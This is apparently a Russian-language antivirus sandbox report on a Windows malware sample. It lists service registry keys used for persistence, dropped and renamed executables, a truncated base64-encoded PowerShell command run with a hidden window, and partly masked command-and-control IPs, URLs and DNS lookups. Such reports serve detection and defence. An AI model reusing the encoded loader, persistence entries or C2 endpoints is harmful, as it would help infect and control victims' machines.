Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\ntlanui2] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\ntlanui2] 'ImagePath' = '"%WINDIR%\SysWOW64\mfcm120u\ntlanui2.exe"'
- 'ntlanui2' "%WINDIR%\SysWOW64\mfcm120u\ntlanui2.exe"
- 'ntlanui2' %WINDIR%\SysWOW64\mfcm120u\ntlanui2.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABUADMAaABmAHMAOAB5AD0AKAAoACcARwA2ACcAKwAnAHIAJwArACcAMQA0AG0AJwApACsAJwB3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAcgBwAHIATwBGAEkATABFAFwAbQAzAFkAZg...
- %HOMEPATH%\m3yfa09\fedmqsu\k2ngq9rh.exe
- %HOMEPATH%\m3yfa09\fedmqsu\k2ngq9rh.exe
- %HOMEPATH%\m3yfa09\fedmqsu\k2ngq9rh.exe в %WINDIR%\syswow64\mfcm120u\ntlanui2.exe
- %HOMEPATH%\m3yfa09\fedmqsu\k2ngq9rh.exe
- '17#.#13.69.136':80
- '51.##.124.206':80
- http://th###work.com/mail.theccwork.com/IJp/
- http://51.##.124.206/Dr6Q17Da8nDzg/g7undgQQNB/xrFtq/TThtKA6yMOHq8gappIS/1ElhocZeZgX80ODxd6Z/qAQntd30qNcXeWt/
- DNS ASK th###work.com
- DNS ASK re######ntprofessional.com
- DNS ASK wr#####fromling.live
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABUADMAaABmAHMAOAB5AD0AKAAoACcARwA2ACcAKwAnAHIAJwArACcAMQA0AG0AJwApACsAJwB3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAcgBwAHIATwBGAEkATABFAFwAbQAzAFkAZg...' (со скрытым окном)